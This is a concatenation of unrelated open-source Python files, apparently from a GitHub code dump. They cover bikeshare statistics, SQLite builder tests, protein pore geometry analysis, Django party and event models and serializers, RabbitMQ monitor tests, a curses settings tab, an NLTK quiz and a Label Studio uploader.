print('The most common hour for starting travel is: ' + str(most_common_hour_start) + ':00 Hrs\n')
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def station_stats(df):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
# display most commonly used start station
most_common_ss = df['Start Station'].mode()[0]
print('The most common start station is: ' + most_common_ss + '\n')
# display most commonly used end station
most_common_es = df['End Station'].mode()[0]
print('The most common end station is: ' + most_common_es + '\n')
# display most frequent combination of start station and end station trip
df['Start & End Station'] = df['Start Station'] + ' -> ' + df['End Station']
most_common_ss_es = df['Start & End Station'].mode()[0]
print('The most common start and end station combination is: ' + most_common_ss_es + '\n')
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(df):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# display total travel time
total_travel_time_seconds = df['Trip Duration'].sum()
total_travel_time_years = round(total_travel_time_seconds / 60 /60 / 24 / 365, 2)
print('The total travel time is: ' + str(total_travel_time_seconds) + ' seconds or ' + str(total_travel_time_years) + ' years\n')
# display mean travel time
mean_travel_time_seconds = round(df['Trip Duration'].mean(), 2)
mean_travel_time_minutes = round(mean_travel_time_seconds / 60, 2)
print('The mean travel time is: ' + str(mean_travel_time_seconds) + ' seconds or ' + str(mean_travel_time_minutes) + ' minutes\n')
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def user_stats(df, city):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
# Display counts of user types
user_types = df['User Type'].value_counts()
print('The number of users of each type are the following: \n')
print(user_types)
if city != 'washington':
print('\n')
# Display counts of gender
gender_counts = df['Gender'].value_counts()
print('The number of users of each gender are the following: \n')
print(gender_counts)
# Display earliest, most recent, and most common year of birth
earliest_yob = df['Birth Year'].min()
print('\nThe earliest year of birth is: ' + str(int(earliest_yob)) + '\n')
latest_yob = df['Birth Year'].max()
print('The most recent year of birth is: ' + str(int(latest_yob)) + '\n')
mostcommon_yob = df['Birth Year'].mode()[0]
print('The most common year of birth is: ' + str(int(mostcommon_yob)) + '\n')
else:
print('Gender & birth stats are not available for Washington \n')
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def main():
while True:
city, month, day = get_filters()
df = load_data(city, month, day)
time_stats(df)
station_stats(df)
trip_duration_stats(df)
user_stats(df,city)
start_row = 0
end_row = 5
raw_data = input('\nWould you like to view the first 5 rows of data ? Enter yes or no.\n').lower()
while raw_data != 'no':
print(df[start_row:end_row])
start_row += 5
end_row += 5
raw_data = input('\nWould you like to view the next 5 rows of data ? Enter yes or no.\n').lower()
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower() != 'yes':
break
if __name__ == "__main__":
main()
| pranath/bikeshare_analysis | bikeshare.py | bikeshare.py | py | 8,092 | python | en | code | 0 | github-code | 50 |
33125097077 |
import pytest
from . import moduleInstalled
pytestmark = pytest.mark.skipif(not moduleInstalled('sqlite3'), reason = 'sqlite3 is not installed.')
import sqlite3
from medoo.base import Base
from medoo.builder import Builder, Field
from medoo.dialect import Dialect
from medoo.database.sqlite import Sqlite, DialectSqlite
@pytest.fixture
def db():
"""Create a database for test"""
db = Sqlite(database_file = 'file://:memory:', dialect = DialectSqlite)
db.query('CREATE TABLE t (id int auto increment, cont text, icont INTEGER);')
data = [
(1, 'a', 0),
(2, 'b', 1),
(3, 'c', 2),
(4, 'd', 9),
(5, 'e', 3),
(6, None, 3),
(7, 'g', 4),
(8, 'h', 5),
(9, 'i', 3),
(10, 'j', 1)
]
db.insert('t', ['id', 'cont', 'icont'], *data)
yield db
class TestSqlite(object):
@pytest.mark.parametrize('args, kwargs, outs', [
([], {'database': ':memory:', 'dialect': None}, None)
])
def test0Init(self, args, kwargs, outs):
outs = outs or {}
db = Sqlite(*args, **kwargs)
assert db.logging == outs.get('logging', False)
assert bool(db.connection) is outs.get('connection', True)
assert bool(db.cursor) is outs.get('cursor', True)
assert db.history == outs.get('history', [])
assert db.errors == outs.get('errors', [])
assert db.sql == outs.get('sql')
assert Builder.DIALECT is outs.get('dialect', DialectSqlite)
assert isinstance(db.builder, Builder)
assert db.last() == ''
assert db.log() == []
def test1Dialect(self):
db = Sqlite(database = ':memory:', dialect = DialectSqlite)
assert Builder.DIALECT is DialectSqlite
db.dialect()
assert Builder.DIALECT is Dialect
db.dialect(DialectSqlite)
assert Builder.DIALECT is DialectSqlite
def test2Insert(self, db):
r = db.insert('t', {'id': 1, 'cont': 'k'})
assert r
rs = db.select('t', where = {'id': 1})
assert len(rs.all()) == 2
r = db.insert('t', ['id', 'cont'], (1, 'l'), (1, 'm'))
rs = db.select('t', where = {'id': 1})
assert len(rs) == 0
assert len(rs.all()) == 4
rs = db.select('t', 'id', distinct = True)
assert len(rs.all()) == 10
def test3Update(self, db):
r = db.update('t', {'cont': 'A'}, {'id':1})
assert r
rs = db.select('t', where = {'id':1})
assert rs[0].cont == 'A'
# update 7 to None, issue #4
r = db.update('t', {'cont': None}, {'id':7})
assert db.get('t', 'cont', where = {'id': 7}) is None
# update 8 to True, issue #4
r = db.update('t', {'icont': True}, {'id':8})
assert db.get('t', 'icont', where = {'id':8}) == 1
def test4Delete(self, db):
r = db.delete('t', {'id':1})
assert r
rs = db.select('t', where = {'id':1})
assert len(rs.all()) == 0
def test5HasGet(self, db):
r = db.has('t', where = {'id': 1})
assert r
r = db.has('t', where = {'id': 20})
assert not r
r = db.get('t', 'cont', where = {'id': 1})
assert r == 'a'
def testSubquery(self, db):
rs = db.select('t', where = {
'id': db.builder.select('t', 'id', where = {'id[<]':5})
})
rs = db.select([
't(t1)',
db.builder.select('t', 'id', sub = 't2')
], 't1.id(id1),t2.id(id2)', where = {'id1[<]': 3, 'id1': Field('id2')})
assert len(rs.all()) == 2
assert rs[0] == {'id1': 1, 'id2': 1}
assert rs[1] == {'id1': 2, 'id2': 2}
| pwwang/pymedoo | tests/test_sqlite.py | test_sqlite.py | py | 3,203 | python | en | code | 15 | github-code | 50 |
10410201734 | import mdtraj
import numpy
import scipy
from scipy.spatial.transform import Rotation
import math
import sys
import csv
from shapely.geometry import Polygon, LinearRing, Point, LineString
from shapely.ops import polylabel
from shapely.validation import make_valid
import shapely
from PIL import Image, ImageDraw
import argparse
import os
# given a plane expressed by a point and a normal vector, returns array of
# vertices projected onto the plane
# from https://stackoverflow.com/questions/35656166/projecting-points-onto-a-plane-given-by-a-normal-and-a-point
def planeprojection(normalvector, centroid, vertices):
shape = vertices.shape #shape of vertex array, can be one vertex or multiple vertices to project
if len(shape)==1:#meaning there is only one vertex
vertex = vertices
#dot product of position vector to the vertex from plane and normal vector
dotscalar = numpy.dot(numpy.subtract(vertex, centroid), normalvector)
#now returning the position vector of the projection onto the plane
return numpy.subtract(vertex,dotscalar*normalvector)
else:
#array to store projectedvectors
projectedvectors = numpy.zeros((shape[0],shape[1]))
#now projecting onto plane, one by one
for counter in range(shape[0]):
vertex = vertices[counter,:]
dotscalar = numpy.dot(numpy.subtract(vertex, centroid), normalvector)
#now returning the position vector of the projection onto the plane
projectedvectors[counter,:] = numpy.subtract(vertex, dotscalar*normalvector)
#now returning the vectors projected
return projectedvectors
def draw_scaled(geom, output, fnumber, i=0):
size = 500
margin = 50
black = (0, 0, 0)
white = (255, 255, 255)
img = Image.new('RGB', (size, size), white)
im_px_access = img.load()
draw = ImageDraw.Draw(img)
# need to scale pore to the proper size for the image
# to do this we need to multiply the points by a transformation matrix that scales
# and then translates them to match the coordinate system of PIL
#bounds is minx, miny, maxx, maxy
#for shape in lr:
xscale = (size-margin*2)/(geom.bounds[2]-geom.bounds[0])
yscale = (size-margin*2)/(geom.bounds[3]-geom.bounds[1])
lr_scaled = shapely.affinity.scale(geom, xfact=xscale, yfact=yscale, origin='center')
xshift = margin-(lr_scaled.bounds[0])
yshift = margin-(lr_scaled.bounds[1])
lr_translated = shapely.affinity.translate(lr_scaled, xoff=xshift, yoff=yshift)
#print(CZr)
#print(CZr_projected)
#print(CZr_projected_aligned)
#print(zprime)
#print(math.degrees(angle))
newpoints = []
if lr_translated.geom_type in ['LinearRing', 'MultiPolygon', 'LineString']:
for point in list(lr_translated.coords):
newpoints.append((int(point[0]), int(point[1])))
elif lr_translated.geom_type == 'Polygon':
for point in list(lr_translated.exterior.coords):
newpoints.append((int(point[0]), int(point[1])))
else:
print(lr_translated.geom_type)
raise ValueError('{} is not a valid shapely geometry to draw'.format(lr_translated.geom_type))
#print(newpoints)
draw.line(newpoints, width=5, fill=black)
name = '{}_poreseg_f{}_{}.png'.format(output, fnumber, i)
img.save(name)
data_dir = '{}_poreseg_out'.format(args.output)
os.rename(name, os.path.join(data_dir, name))
return
def pore_numbers_3mt6(trajfile, topfile, chainlist, fskip, output, residue, sidechain):
# for each frame calculate the pore width and other variables
# assumes that indices denotes the ARG residues that are members of the pores
# angledata shape is (chainID, frames, 2) (theta angle, azimuthal angle)
# poredata shape is (frame, 3) (pore area, pore width, pore angle)
top = mdtraj.load(topfile).topology
traj = mdtraj.load_xtc(trajfile, top)
angledata = []
for i in range(0, len(chainlist)):
angledata.append([])
poredata = []
chains = ' '.join([str(x) for x in chainlist])
CAs = top.select('name CA and residue {} and chainid '.format(residue) + chains)
CZs = top.select('name {} and residue {} and chainid '.format(sidechain, residue) + chains)
imgs = []
for fnumber, frame in enumerate(traj):
poredata.append([0, 0, 0])
CAr = frame.xyz[0][CAs]
CZr = frame.xyz[0][CZs]
#print(CAr)
# find best fitting center between all the alpha carbons of ARG15s, which denotes the pore center
# (is placed inside array, which is why [0])
porecenter = numpy.mean(CZr, axis=0, keepdims=True)[0]
# find the singular value decomposition of the CZr with the centroid removed
u, s, vh = numpy.linalg.svd(CZr - porecenter, full_matrices=True)
# extract the best fitting right singular vector which is the normal of the plane
# this is the last column of v and is guaranteed to be orthogonal to all other dimensional vectors of CZr and v
# need to transpose vh first to get v
# then get the rightmost column ([:,-1] means every row, last column in matrix read from left to right)
zprime = numpy.transpose(vh)[:, -1]
# find the centroid of the protein
# (is placed inside array, which is why [0])
center = numpy.mean(frame.xyz[0], axis=0, keepdims=True)[0]
# if the porecenter+zprime is closer to the protein center than porecenter, zprime needs to be flipped to point
# away from the decomposition chamber (out of the protein)
# ord=2 denotes Euclidian norm, or length of the vector
if numpy.linalg.norm((porecenter+zprime)-center, ord=2) < numpy.linalg.norm(porecenter-center, ord=2):
zprime = zprime*-1
#print(zprime)
# find the projections of all CAr and CZr onto the plane of the pore along the zprime axis
CAr_projected = planeprojection(zprime, porecenter, CAr)
#print(CZr)
CZr_projected = planeprojection(zprime, porecenter, CZr)
#print(CZr_projected)
# these points are not necessarily aligned with the xyz axes
# (although many times they are approximately aligned with the x axis meaning the x axis can pass through the center of the pore,
# due to alignment of the entire protein during simulation setup)
# so rotate them in such a way that the zprime axes is pointing directly out of the screen
# which corresponds to looking at the pore from the outside of the protein
zprimemag = numpy.linalg.norm(zprime, ord=2)
# 0, 0, 1 is pointing out of the screen in VMD
angle = math.acos(numpy.dot(zprime, [0, 0, 1])/(zprimemag))
#print(math.degrees(angle))
# even though we have the angle we need an axis to rotate about
# the cross product of the zprime and z axes can give us this axis because it is perpendicular to both
rotaxis = numpy.cross(zprime, [0, 0, 1])
# CZr are row vectors so initialize the rotation matrix with a row vector
r = Rotation.from_rotvec(angle*rotaxis)
# CZr are row vectors
# apply() rotates each vector by the rotation matrix in turn
# and returns a matrix of row vectors
CZr_projected_aligned = r.apply(CZr_projected)
#p = Polygon(CZr_projected_aligned)
pore = make_valid(Polygon(CZr_projected_aligned))
# p may be a multipolygon or some other object
# so find the one with the largest area
# and print the other areas
if pore.geom_type == 'MultiPolygon':
draw_scaled(Polygon(CZr_projected_aligned), output, fnumber)
largest = 0
p = None
print()
print('frame {} complex pore shape, taking largest area'.format(fnumber))
for i, poreseg in enumerate(pore.geoms):
print(poreseg.area)
if poreseg.area > largest:
p = poreseg
largest = poreseg.area
poreseg = LineString(poreseg.exterior.coords)
draw_scaled(poreseg, output, fnumber, i+1)
print('largest area: >>>{}<<<'.format(largest))
else:
print()
print('frame {} recording full pore'.format(fnumber))
p = pore
print(p.area)
print(p.geom_type)
lr = LinearRing(p.exterior.coords)
# find the largest inscribed circle of this coplanar set of points
# the diameter of this circle is the pore width
#Point of inaccessibility is the center of the largest inscribed circle
poa = polylabel(p, tolerance=0.000001)
#find closest distance to any point on the heptagon which is the radius of the largest inscribed circle
pore_width = poa.distance(lr)*2
#print("LIC: {}\nArea: {}\nDiameter: {}".format(poa, p.area, pore_width))
poredata[-1][0] = p.area
poredata[-1][1] = pore_width
poredata[-1][2] = math.degrees(angle)
# find all the theta angles
for chainindex, alphaC in enumerate(CAr):
r = alphaC - CZr[chainindex]
# theta is dot product between vector from CA to CZ and zprime
zprimemag = numpy.linalg.norm(zprime, ord=2)
rmag = numpy.linalg.norm(r, ord=2)
theta = math.degrees(math.acos(numpy.dot(zprime, r)/(zprimemag*rmag)))
angledata[chainindex].append([theta, 0])
# find azimuthal angles
# use CAr_projected because we want yprime to be orthogonal to zprime
for chainindex, alphaC in enumerate(CAr_projected):
yprime = alphaC-porecenter
# original paper had the xprime axes being yprime cross zprime
xprime = numpy.cross(yprime, zprime)
r = CZr_projected[chainindex]-alphaC
xprimemag = numpy.linalg.norm(xprime, ord=2)
rmag = numpy.linalg.norm(r, ord=2)
azimuth = math.degrees(math.acos(numpy.dot(xprime, r)/(xprimemag*rmag)))
#add azimuth to newest frame
angledata[chainindex][-1][-1] = azimuth
size = 500
margin = 50
if fnumber%fskip == 0:
black = (0, 0, 0)
white = (255, 255, 255)
img = Image.new('RGB', (size, size), white)
im_px_access = img.load()
draw = ImageDraw.Draw(img)
# need to scale pore to the proper size for the image
# to do this we need to multiply the points by a transformation matrix that scales
# and then translates them to match the coordinate system of PIL
#bounds is minx, miny, maxx, maxy
xscale = (size-margin*2)/(lr.bounds[2]-lr.bounds[0])
yscale = (size-margin*2)/(lr.bounds[3]-lr.bounds[1])
lr_scaled = shapely.affinity.scale(lr, xfact=xscale, yfact=yscale, origin='center')
xshift = margin-(lr_scaled.bounds[0])
yshift = margin-(lr_scaled.bounds[1])
lr_translated = shapely.affinity.translate(lr_scaled, xoff=xshift, yoff=yshift)
#print(CZr)
#print(CZr_projected)
#print(CZr_projected_aligned)
#print(zprime)
#print(math.degrees(angle))
newpoints = []
for point in list(lr_translated.coords):
newpoints.append((int(point[0]), int(point[1])))
#print(newpoints)
draw.line(newpoints, width=5, fill=black)
#origin = (lr_translated.bounds[0], lr_translated.bounds[1])
#poa_scaled = shapely.affinity.scale(poa, xfact=xscale, yfact=yscale, origin='center')
#poa_translated = shapely.affinity.translate(poa_scaled, xoff=xshift, yoff=yshift)
poa_translated = polylabel(Polygon(lr_translated), tolerance=1)
x, y = poa_translated.coords[0]
draw.point((x, y), black)
d = poa_translated.distance(lr_translated)
rect = (x-d, y-d, x+d, y+d)
draw.arc(rect, 0, 359, fill=(255, 0, 0), width=2)
imgs.append(img)
return angledata, poredata, imgs
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Calculate key data of 3mt6/1yg6 pores")
parser.add_argument('-f', '--trajectory', type=str, help='The trajectory file to analyze', required=True)
parser.add_argument('-s', '--topology', type=str, help='The topology file to use', required=True)
parser.add_argument('-c', '--chains', type=int, help='The chain indexes to pick from', nargs='+', required=True)
parser.add_argument('-o', '--output', type=str, help='The prefix of the output files', default='3mt6')
parser.add_argument('-fs', '--frameskip', type=int, help='Every frameskip frames, output a picture of the pore', \
default=10)
parser.add_argument('-r', '--residue', type=int, help='The residue number to pick', required=True)
parser.add_argument('-an', '--atomn', type=str, help='The sidechain atom name on the specific residue to pick', \
default='CZ')
args = parser.parse_args()
data_dir = '{}_out'.format(args.output)
try:
os.mkdir(data_dir)
except FileExistsError:
pass
try:
os.mkdir('{}_poreseg_out'.format(args.output))
except FileExistsError:
pass
angledata, poredata, imgs = pore_numbers_3mt6(args.trajectory, args.topology, args.chains, args.frameskip, args.output, args.residue, args.atomn)
for i, img in enumerate(imgs):
name = '{}_frame_{}.png'.format(args.output, i*args.frameskip)
img.save(name)
os.rename(name, os.path.join(data_dir, name))
# Write angle data for each chain
with open('{}_angles.csv'.format(args.output), 'w') as f:
write = csv.writer(f)
for index, chain in enumerate(angledata):
write.writerow(['Chain ID {}'.format(args.chains[index])])
write.writerow(['Frame', 'Theta', 'Azimuth'])
for frameindex, frame in enumerate(chain):
write.writerow([frameindex, *tuple(frame)])
os.rename('{}_angles.csv'.format(args.output), os.path.join(data_dir, '{}_angles.csv'.format(args.output)))
# Write pore width and diameter
with open('{}_pore.csv'.format(args.output), 'w') as f:
write = csv.writer(f)
write.writerow(['Frame', 'Pore Area', 'Pore Width', 'Pore Angle'])
for frameindex, frame in enumerate(poredata):
write.writerow([frameindex, *tuple(frame)])
os.rename('{}_pore.csv'.format(args.output), os.path.join(data_dir, '{}_pore.csv'.format(args.output)))
sys.exit()
#
| ts-hayden-dennison/pore_info | pore_info.py | pore_info.py | py | 13,353 | python | en | code | 0 | github-code | 50 |
70695901917 | import requests
from django.core.management.base import BaseCommand
from uk_political_parties.models import Party, PartyEmblem
class Command(BaseCommand):
def clean_party(self, party_id, party):
cleaned_party = {
"party_id": party_id,
"party_name": party["name"],
"registered_date": party["date_registered"],
"register": party["register"],
}
return cleaned_party
def handle(self, **options):
base_url = "https://candidates.democracyclub.org.uk"
url = "{}/api/next/parties/".format(base_url)
while url:
req = requests.get(url)
results = req.json()
organizations = results["results"]
for org in organizations:
party_id = org["ec_id"]
print(party_id, org["name"])
(party_obj, created) = Party.objects.update_or_create(
party_id=party_id, defaults=self.clean_party(party_id, org)
)
if org["emblems"]:
for emblem in org["emblems"]:
PartyEmblem.objects.update_or_create(
party_id=party_id, emblem_url=emblem["image"],
)
url = results.get("next", None)
| DemocracyClub/electionleaflets | electionleaflets/apps/core/management/commands/import_parties.py | import_parties.py | py | 1,313 | python | en | code | 8 | github-code | 50 |
29991018390 | from functools import partial as p
import os
import string
from tests.helpers import fake_backend
from tests.helpers.util import wait_for, run_agent, run_container, container_ip
from tests.helpers.assertions import *
rabbitmq_config = string.Template("""
monitors:
- type: collectd/rabbitmq
host: $host
port: 15672
username: guest
password: guest
collectNodes: true
collectChannels: true
""")
def test_rabbitmq():
with run_container("rabbitmq:3.6-management") as rabbitmq_cont:
host = container_ip(rabbitmq_cont)
config = rabbitmq_config.substitute(host=host)
assert wait_for(p(tcp_socket_open, host, 15672), 60), "service didn't start"
with run_agent(config) as [backend, _, _]:
assert wait_for(p(has_datapoint_with_dim, backend, "plugin", "rabbitmq")), "Didn't get rabbitmq datapoints"
assert wait_for(p(has_datapoint_with_dim, backend, "plugin_instance", "%s-15672" % host)), \
"Didn't get expected plugin_instance dimension"
def test_rabbitmq_broker_name():
with run_container("rabbitmq:3.6-management") as rabbitmq_cont:
host = container_ip(rabbitmq_cont)
config = rabbitmq_config.substitute(host=host)
assert wait_for(p(tcp_socket_open, host, 15672), 60), "service didn't start"
with run_agent("""
monitors:
- type: collectd/rabbitmq
host: %s
brokerName: '{{.host}}-{{.username}}'
port: 15672
username: guest
password: guest
collectNodes: true
collectChannels: true
""" % (host,)) as [backend, _, _]:
assert wait_for(p(has_datapoint_with_dim, backend, "plugin_instance", "%s-guest" % host)), \
"Didn't get expected plugin_instance dimension"
| someword/signalfx-agent | tests/monitors/rabbitmq_test.py | rabbitmq_test.py | py | 1,758 | python | en | code | null | github-code | 50 |
3847494735 | # -*- coding: utf-8 -*-
"""
settings tab
"""
import curses
from curse.tab_gen import TabEntry
from curse.menu_gen import MenuEntry
from curse.list_gen import List
class TabSettings(TabEntry):
""" setting tab """
def __init__(self, parent):
""" initialisation """
TabEntry.__init__(self, 'Settings')
self.parent = parent
self.listkeys = None
def display(self):
""" display the tab """
self.changeMenu()
self.listkeys = self.parent.options.conf.keys()
listvalues = []
for key in self.listkeys:
listvalues.append(self.parent.options.conf[key])
visible2 = List(self.screen, self.listkeys, False)
visible2.display(10, 4, 15)
self.visible = List(self.screen, listvalues, True)
self.visible.display(28, 4, 15)
def changeMenu(self):
""" change entry in action """
self.parent.action_menu.removeAllEntries()
self.parent.action_menu.addSubEntry(MenuEntry('Change value', 7, \
action=self.changevalue))
self.parent.action_menu.addSubEntry(MenuEntry('Save', \
action=self.savesetting))
self.parent.action_menu.addSubEntry(MenuEntry('Close', \
action=self.parent.tabs.closeActiveTab))
def changevalue(self):
""" change a setting value """
pos = self.visible.posend
width = self.screen.getmaxyx()[1]-32
self.screen.addstr(pos[0], pos[1], ' '*width)
curses.curs_set(1)
curses.nocbreak()
curses.echo()
self.screen.move(pos[0], pos[1])
name = self.screen.getstr()
curses.noecho()
curses.curs_set(0)
curses.cbreak()
if name != '':
self.visible.list_elt[self.visible.active] = name
self.visible.update()
def savesetting(self):
""" save the settings """
opt = {}
for i in range(len(self.listkeys)):
opt[self.listkeys[i]] = self.visible.list_elt[i]
self.parent.options.conf.update(opt)
self.parent.options.saveConf()
| sensini42/flvdown | curse/tab_settings.py | tab_settings.py | py | 2,117 | python | en | code | 3 | github-code | 50 |
20058427342 | import nltk as mahedi
print("1. Bangladesh\n2. Taj Mahal\n3. Unreal Engine\n4. BCB\n5. kuet")
a = int(input("Choose an option: "))
if a == 1:
f = open("trial.txt", "r")
str = f.read()
elif a == 2:
f = open("tajMahal.txt", "r")
str = f.read()
elif a == 3:
f = open("unreal.txt", "r")
str = f.read()
elif a == 4:
f = open("bdckt.txt", "r")
str = f.read()
elif a == 5:
f = open("kuet.txt", "r")
str = f.read()
dummy = []
tags = []
words = []
score = 0
ans = ""
tok = mahedi.sent_tokenize(str)
for t in tok:
tok1 = mahedi.word_tokenize(t)
pos = mahedi.pos_tag(tok1)
flag = 0
ans = ""
for i in pos:
tags.append(i[1])
words.append(i[0])
dummy.append(i[1])
if "CD" not in tags:
it = 0
while it < len(tags):
if tags[it] == 'NNP' or tags[it] == 'NNPS':
itt = it + 1
tags[it] = 'null'
while itt < len(tags):
if tags[itt] == 'NNP' or tags[itt] == 'NNPS':
tags[itt] = 'null'
else:
break
itt += 1
break
it += 1
else:
it = 0
while it < len(tags):
if tags[it] == 'CD':
itt = it + 1
tags[it] = 'null'
while itt < len(tags):
if tags[it] == 'CD':
tags[itt] = 'null'
else:
break
itt += 1
break
it += 1
itt = 0
flag = 0
while itt < len(tags):
if dummy[itt] == tags[itt]:
print(words[itt], end=" ")
else:
if flag == 0:
print("______", end=" ")
flag = 1
ans = ans + words[itt] + " "
itt+=1
tags=[]
dummy=[]
words=[]
print()
answer = input("Answer: ")
answer = answer + " "
if ans.upper() == answer.upper():
print("Correct")
score = score + 1
else:
print("Wrong")
print(ans.split(" "))
print(answer.split(" "))
print("Your score is: ")
print(score)
| Prime1996/Quizzy | jbgv.py | jbgv.py | py | 2,303 | python | en | code | 1 | github-code | 50 |
16075610767 | # Import the SDK and the client module
import asyncio
import os
import requests
from label_studio_sdk import Client
from const import LABEL_STUDIO_URL, API_KEY, IMPORT_PATH, PROJ_ID
async def upload_img(path):
# Upload the files in ./img
headers = {
'Authorization': 'Token ' + API_KEY,
}
files = {
'FileUpload': (path, open(path, 'rb')),
}
print("已上传:" + path)
return requests.post(LABEL_STUDIO_URL + '/api/projects/' + str(PROJ_ID) + '/import',
headers=headers, files=files)
async def main():
# Connect to the Label Studio API and check the connection
global file
lbsd = Client(url=LABEL_STUDIO_URL, api_key=API_KEY)
if not lbsd.check_connection()['status'] == 'UP':
print('Connection Fails! Please try again.')
else:
print('Connection Succeeds!')
# Find the files in ./img
for root, directory, file in os.walk(IMPORT_PATH):
break
response_table = []
file = list(map(lambda name: IMPORT_PATH + name, file))
for uploader in asyncio.as_completed(map(upload_img, file)):
response_table.append((await uploader).json())
[print(item) for item in response_table]
if __name__ == '__main__':
# loop = asyncio.get_event_loop()
# loop.run_until_complete(main())
asyncio.run(main())
| haifengjia/Label-Studio-PyScripts | importer.py | importer.py | py | 1,378 | python | en | code | 0 | github-code | 50 |
38764130509 | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def isSameTree(self, p: TreeNode, q: TreeNode) -> bool:
'''All algos Time: O(n) Space: O(h) (=O(logn) if balanced otherwise O(n))'''
'''recursive solution'''
# if not p and not q:
# return True
# if (not p or not q) or p.val != q.val:
# return False
# return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)
'''iterative solution (DFS)'''
# stack = [(p, q)]
# while stack:
# p, q = stack.pop()
# if not p and not q:
# continue
# if (not p or not q) or p.val != q.val:
# return False
# stack.append((p.right, q.right))
# stack.append((p.left, q.left))
# return True
'''iterative solution (BFS)'''
from collections import deque
queue = deque([(p, q)])
while queue:
p, q = queue.popleft()
if not p and not q:
continue
if (not p or not q) or p.val != q.val:
return False
queue.append((p.left, q.left))
queue.append((p.right, q.right))
return True
| coldmanck/leetcode-python | 0100_Same_Tree.py | 0100_Same_Tree.py | py | 1,401 | python | en | code | 5 | github-code | 50 |
44054688012 | from django.db import models
from django.conf import settings
class YoutubeCredential(models.Model):
class Meta:
db_table = 'youtube_credentials'
verbose_name = 'Youtube Credential'
verbose_name_plural = 'Youtube Credentials'
account_id = models.OneToOneField(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
db_column='account_id',
primary_key=True,
)
creator_id = models.ForeignKey(
'creators.Creator',
on_delete=models.CASCADE,
db_column='creator_id',
related_name='youtube_credentials',
)
token = models.TextField()
refresh_token = models.TextField()
token_uri = models.TextField()
client_id = models.TextField()
client_secret = models.TextField()
scope = models.TextField()
| TonysHub/collaberr-backend | core/api/youtube_analytics/models/auth.py | auth.py | py | 818 | python | en | code | 1 | github-code | 50 |
37210978312 | from typing import Dict, Union
from django.utils.translation import gettext as _
from rest_framework import serializers
from authentication.models import User
from content.models import Resource, Task, Topic
from utils.utils import (
validate_creation_and_deletion_dates,
validate_creation_and_deprecation_dates,
validate_empty,
validate_object_existence,
)
from .models import (
Event,
EventAttendee,
EventAttendeeStatus,
EventFormat,
EventResource,
EventRole,
EventTask,
EventTopic,
Format,
Role,
)
class EventSerializer(serializers.ModelSerializer[Event]):
class Meta:
model = Event
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
required_fields = [
"name",
"tagline",
"type",
"description",
"get_involved_text",
"start_time",
"end_time",
"created_by",
"creation_date",
"deletion_date",
]
def isEmpty() -> bool:
for field in required_fields:
if data[field] == "" or data[field] is None:
return True
return False
if isEmpty():
raise serializers.ValidationError(
_(
"Only the fields offline_location_lat and offline_location_long fields can be empty for Events."
),
code="invalid_value",
)
validate_creation_and_deletion_dates(data)
validate_object_existence(User, data["created_by"])
return data
class FormatSerializer(serializers.ModelSerializer[Event]):
class Meta:
model = Format
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_empty(data["name"], "name")
validate_empty(data["description"], "description")
validate_creation_and_deprecation_dates(data)
validate_creation_and_deletion_dates(data)
return data
class RoleSerializer(serializers.ModelSerializer[Event]):
class Meta:
model = Role
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_empty(data["name"], "name")
validate_empty(data["description"], "description")
validate_creation_and_deprecation_dates(data)
return data
class EventAttendeeSerializer(serializers.ModelSerializer[EventAttendee]):
class Meta:
model = EventAttendee
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_empty(data["event_id"], "event_id")
validate_empty(data["user_id"], "user_id")
validate_empty(data["role_id"], "role_id")
validate_object_existence(Event, data["event_id"])
validate_object_existence(User, data["user_id"])
validate_object_existence(Role, data["role_id"])
return data
class EventFormatSerializer(serializers.ModelSerializer[EventFormat]):
class Meta:
model = EventFormat
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_empty(data["event_id"], "event_id")
validate_empty(data["format_id"], "format_id")
validate_object_existence(Event, data["event_id"])
validate_object_existence(Format, data["format_id"])
return data
class EventAttendeeStatusSerializer(serializers.ModelSerializer[EventAttendeeStatus]):
class Meta:
model = EventAttendeeStatus
fields = "__all__"
class EventResourceSerializer(serializers.ModelSerializer[EventResource]):
class Meta:
model = EventResource
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_empty(data["event_id"], "event_id")
validate_empty(data["resource_id"], "resource_id")
validate_object_existence(Event, data["event_id"])
validate_object_existence(Resource, data["resource_id"])
return data
class EventRoleSerializer(serializers.ModelSerializer[EventRole]):
class Meta:
model = EventRole
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_object_existence(Event, data["event_id"])
validate_object_existence(Role, data["role_id"])
return data
class EventTaskSerializer(serializers.ModelSerializer[EventTask]):
class Meta:
model = EventTask
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_object_existence(Event, data["event_id"])
validate_object_existence(Task, data["task_id"])
return data
class EventTopicSerializer(serializers.ModelSerializer[EventTopic]):
class Meta:
model = EventTopic
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_object_existence(Event, data["event_id"])
validate_object_existence(Topic, data["topic_id"])
return data
| PabloSSena/activist | backend/events/serializers.py | serializers.py | py | 5,342 | python | en | code | null | github-code | 50 |
32660302619 | '''
Created on Oct 12, 2018
@author: purboday
'''
from riaps.run.comp import Component
import logging
import time
import os
class Seller(Component):
def __init__(self, sellernum):
